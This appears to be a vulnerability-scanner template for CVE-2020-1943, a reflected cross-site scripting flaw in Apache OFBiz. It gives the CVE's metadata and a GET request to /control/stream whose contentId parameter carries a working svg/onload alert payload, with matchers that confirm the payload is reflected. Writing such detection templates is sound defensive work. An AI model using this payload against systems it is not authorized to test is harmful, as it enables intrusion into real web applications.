40 lines
1.2 KiB
YAML
40 lines
1.2 KiB
YAML
id: CVE-2020-1943
|
|
|
|
info:
|
|
name: Apache OFBiz Reflected XSS
|
|
author: pdteam
|
|
severity: medium
|
|
description: Data sent with contentId to /control/stream is not sanitized, allowing XSS attacks in Apache OFBiz 16.11.01 to 16.11.07.
|
|
reference:
|
|
- https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E
|
|
- https://s.apache.org/pr5u8
|
|
- https://lists.apache.org/thread.html/r034123f2767830169fd04c922afb22d2389de6e2faf3a083207202bc@%3Ccommits.ofbiz.apache.org%3E
|
|
- https://lists.apache.org/thread.html/r8efd5b62604d849ae2f93b2eb9ce0ce0356a4cf5812deed14030a757@%3Cdev.ofbiz.apache.org%3E
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2020-1943
|
|
cwe-id: CWE-79
|
|
tags: cve,cve2020,apache,xss,ofbiz
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "<svg/onload=alert(/xss/)>"
|
|
part: body
|
|
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|